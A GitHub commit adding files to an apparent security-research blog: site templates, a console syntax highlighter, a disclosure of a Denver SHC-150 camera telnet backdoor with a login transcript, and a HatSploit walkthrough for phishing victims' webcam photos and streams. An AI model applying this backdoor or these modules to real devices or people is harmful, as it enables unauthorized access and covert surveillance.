Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@enty8080
enty8080 authored Nov 20, 2024
1 parent d570fdd commit 01e539a
Show file tree
Hide file tree
Showing 12 changed files with 821 additions and 2 deletions.
129 changes: 129 additions & 0 deletions _includes/head.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,129 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
<meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta
name="viewport"
content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
>

{%- capture seo_tags -%}
{% seo title=false %}
{%- endcapture -%}

<!-- Setup Open Graph image -->

{% if page.image %}
{% assign src = page.image.path | default: page.image %}

{% unless src contains '://' %}
{%- capture img_url -%}
{% include media-url.html src=src subpath=page.media_subpath absolute=true %}
{%- endcapture -%}

{%- capture old_url -%}{{ src | absolute_url }}{%- endcapture -%}
{%- capture new_url -%}{{ img_url }}{%- endcapture -%}

{% assign seo_tags = seo_tags | replace: old_url, new_url %}
{% endunless %}

{% elsif site.social_preview_image %}
{%- capture img_url -%}
{% include media-url.html src=site.social_preview_image absolute=true %}
{%- endcapture -%}

{%- capture og_image -%}
<meta property="og:image" content="{{ img_url }}" />
{%- endcapture -%}

{%- capture twitter_image -%}
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="{{ img_url }}" />
{%- endcapture -%}

{% assign old_meta_clip = '<meta name="twitter:card" content="summary" />' %}
{% assign new_meta_clip = og_image | append: twitter_image %}
{% assign seo_tags = seo_tags | replace: old_meta_clip, new_meta_clip %}
{% endif %}

{{ seo_tags }}

<title>
{%- unless page.layout == 'home' -%}
{{ page.title | append: ' | ' }}
{%- endunless -%}
{{ site.title }}
</title>

{% include_cached favicons.html %}

<!-- Resource Hints -->
{% unless site.assets.self_host.enabled %}
{% for hint in site.data.origin.cors.resource_hints %}
{% for link in hint.links %}
<link rel="{{ link.rel }}" href="{{ hint.url }}" {{ link.opts | join: ' ' }}>
{% endfor %}
{% endfor %}
{% endunless %}

<!-- Bootstrap -->
{% unless jekyll.environment == 'production' %}
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
{% endunless %}

<!-- Theme style -->
<link rel="stylesheet" href="{{ '/assets/css/:THEME.css' | replace: ':THEME', site.theme | relative_url }}">

<!-- Web Font -->
<link rel="stylesheet" href="{{ site.data.origin[type].webfonts | relative_url }}">

<!-- Font Awesome Icons -->
<link rel="stylesheet" href="{{ site.data.origin[type].fontawesome.css | relative_url }}">

<!-- 3rd-party Dependencies -->

{% if site.toc and page.toc %}
<link rel="stylesheet" href="{{ site.data.origin[type].toc.css | relative_url }}">
{% endif %}

{% if page.layout == 'post' or page.layout == 'page' or page.layout == 'home' %}
<link rel="stylesheet" href="{{ site.data.origin[type]['lazy-polyfill'].css | relative_url }}">
{% endif %}

{% if page.layout == 'page' or page.layout == 'post' %}
<!-- Image Popup -->
<link rel="stylesheet" href="{{ site.data.origin[type].glightbox.css | relative_url }}">
{% endif %}

<!-- Scripts -->

{% unless site.theme_mode %}
<script src="{{ '/assets/js/dist/theme.min.js' | relative_url }}"></script>
{% endunless %}

{% include js-selector.html lang=lang %}

{% if jekyll.environment == 'production' %}
<!-- PWA -->
{% if site.pwa.enabled %}
<script
defer
src="{{ '/app.min.js' | relative_url }}?baseurl={{ site.baseurl | default: '' }}&register={{ site.pwa.cache.enabled }}"
></script>
{% endif %}

<!-- Web Analytics -->
{% for analytics in site.analytics %}
{% capture str %}{{ analytics }}{% endcapture %}
{% assign platform = str | split: '{' | first %}
{% if site.analytics[platform].id and site.analytics[platform].id != empty %}
{% include analytics/{{ platform }}.html %}
{% endif %}
{% endfor %}
{% endif %}

{% include metadata-hook.html %}
<link rel="stylesheet" href="{% link assets/main.css %}">
</head>
82 changes: 82 additions & 0 deletions _plugins/entysec.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,82 @@
require 'rouge'

module Rouge
module Tokens
def self.token(name, shortname, &b)
tok = Token.make_token(name, shortname, &b)
const_set(name, tok)
end

SHORTNAME = 'z'

token :EntySec, SHORTNAME do
token :Prompt, "#{SHORTNAME}p"
token :Error, "#{SHORTNAME}e"
token :Good, "#{SHORTNAME}g"
token :Status, "#{SHORTNAME}s"
token :Warning, "#{SHORTNAME}w"
token :Info, "#{SHORTNAME}i"
end
end

module Lexers
class EntySecConsoleLanguage < Rouge::RegexLexer
title 'entysec'
tag 'entysec'
desc 'EntySec Console Highlighter'
filenames []
mimetypes []

def self.keywords
@keywords ||= Set.new %w()
end

state :whitespace do
rule %r/\s+/, Text
end

state :root do
mixin :whitespace

rule %r{^(pwny:)}, Text, :pwny_prompt
rule %r{^\[-\]}, Tokens::EntySec::Error
rule %r{^\[\+\]}, Tokens::EntySec::Good
rule %r{^\[\*\]}, Tokens::EntySec::Status
rule %r{^\[\!\]}, Tokens::EntySec::Warning
rule %r{^(\[i\]|\[\?\]|\[>\])}, Tokens::EntySec::Info
rule %r{^(\[)}, Text, :hsf_prompt
rule %r{^(\()}, Text, :regular_prompt
rule %r{.+}, Text
end

state :regular_prompt do
mixin :whitespace

rule %r{ghost|seashell}, Tokens::EntySec::Prompt
rule %r{:}, Punctuation
rule %r{[.\w/-]+}, Tokens::EntySec::Error
rule %r{\)}, Punctuation
rule %r{>}, Punctuation, :pop!
end

state :hsf_prompt do
mixin :whitespace

rule %r{hsf\d?}, Tokens::EntySec::Warning
rule %r{exploit|auxiliary|post}, Text
rule %r{:}, Punctuation
rule %r{\]}, Punctuation
rule %r{[.\w/-]+}, Tokens::EntySec::Error
rule %r{>}, Punctuation, :pop!
end

state :pwny_prompt do
mixin :whitespace

rule %r{(/[\w/]*)(?=\s)}, Tokens::EntySec::Prompt
rule %r{(\w+)}, Tokens::EntySec::Status
rule %r{\$|\#}, Punctuation, :pop!
end
end
end
end
48 changes: 48 additions & 0 deletions _posts/2021-07-28-denver-backdoors.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
---
title: Denver SHC-150 Camera Backdoor
categories: [Exploitation]
tags: [research, backdoor, iot]
---

<p align="center">
<img width="100%" src="/assets/img/shc-150-specs.png">
</p>

Backdoor was found in a Denver SHC-150 Smart Wifi Camera by Ivan Nikolsky, security researcher from EntySec.

> I bought this model of wifi camera in the shop and before setting it up, checked it for vulnerabilities and backdoors.
> I scanned this camera for open ports and noticed that telnet service is running on port 23. I brute-forced credentials and logged right to the shell.
> There is no way to close this port or change credentials - they are hardcoded. Maybe other models also have this backdoor too, I am not sure.
>
> -- <cite>Ivan Nikolskiy</cite>
So, the telnet service, as Ivan noticed, has hardcoded credentials and after brute-forcing them he found out that the only thing which is needed to login is username - `default`.

```shell
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.

goke login: default
$ ls /
bin home linuxrc opt run tmp
dev init media proc sbin usr
etc lib mnt root sys var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```

As you can see, successfull login leads to the shell of the camera. Also he found out that Denver SHC-150 Smart Wifi Camera runs on `armle` CPU and has `r/w` filesystem.

> So, backdoor is a factory telnet credential - `default`.
> Just open the telnet connection with the camera on port 23 and enter `default`.
> After this, you'll get a Linux shell.
> Backdoor allows an attacker to execute commands on OS lever through telnet.
>
> -- <cite>Ivan Nikolskiy</cite>
Ivan has already posted this research [here](https://www.exploit-db.com/exploits/50160).
97 changes: 97 additions & 0 deletions _posts/2022-03-13-webcam-photo-phishing.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
---
title: Webcam Photo Phishing
categories: [Exploitation]
tags: [hatsploit, phishing]
---

Phishing is a common technique used by attackers to gain access to sensitive information through methods like social engineering. Attackers often attempt to obtain credentials, password hashes, location data, and other critical information by tricking users into revealing this data.

In the HatSploit Framework, EntySec has implemented several modules specifically designed to target a victim’s webcam. These modules allow attackers to take a photo using the target's webcam through a browser and save the captured image as loot on the attacker's machine. Additionally, attackers can stream the webcam footage in real-time. These modules are named `exploit/generic/gather/browser_webcam_photo` and `exploit/generic/gather/browser_webcam_stream`.

Here’s how you can access and use these modules:

```entysec
[hsf3]> search webcam
Modules:
Number Category Module Rank Name
0 exploit exploit/generic/gather/browser_webcam_photo low Gather Browser Webcam Photo
1 exploit exploit/generic/gather/browser_webcam_stream low Gather Browser Webcam Stream
```

## Using the module

Once you have identified the desired module, you can use it within the HatSploit Framework and set the appropriate options.

For example, to use the `Gather Browser Webcam Photo` module:

```entysec
[hsf]> use 0
[hsf3: Gather Browser Webcam Photo]> info
Name: Gather Browser Webcam Photo
Module: exploit/generic/gather/browser_webcam_photo
Platform: generic
Rank: low
Authors:
Ivan Nikolskiy (enty8080) - module developer
Description:
This module generates a webpage that, when accessed by a victim, attempts to capture an image using the built-in webcam and send it to the attacker.
References:
URL: https://blog.entysec.com/2022-03-13-webcam-photo-phishing/
Stability:
This module is stable and does not crash the target.
```

## Configuring the module

You will need to configure several options before running the module:

```entysec
[hsf3: Gather Browser Webcam Photo]> options
Module Options (exploit/generic/gather/browser_webcam_photo):
Option Value Required Description
HOST yes HTTP host.
MESSAGE Grant Access yes Message to display.
PATH /Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png yes Path to save file.
PORT 80 yes HTTP port.
SSL no no Use SSL.
TIMEOUT 10 no Connection timeout.
URLPATH / yes File path on server.
```

## Running the module

After configuring the options, you can start the web server and wait for the victim to access the malicious webpage. The module will continue to capture images from the victim’s webcam until it is manually interrupted.

Here’s an example:

```entysec
[hsf3: Gather Browser Webcam Photo]> set host localhost
[i] host => localhost
[hsf3: Gather Browser Webcam Photo]> set port 8080
[i] port => 8080
[hsf3: Gather Browser Webcam Photo]> run
[*] Starting HTTP listener on port 8080...
[*] Delivering payload...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[!] Exploit module interrupted.
```

This module will continue to capture and update the photo file saved in the loot directory until you stop it manually with keyboard interrupt (Ctrl-C).

By utilizing this module, attackers can gain access to sensitive webcam data through the use of phishing techniques, making it an essential tool in the HatSploit Framework.
Loading

0 comments on commit 01e539a

Please sign in to comment.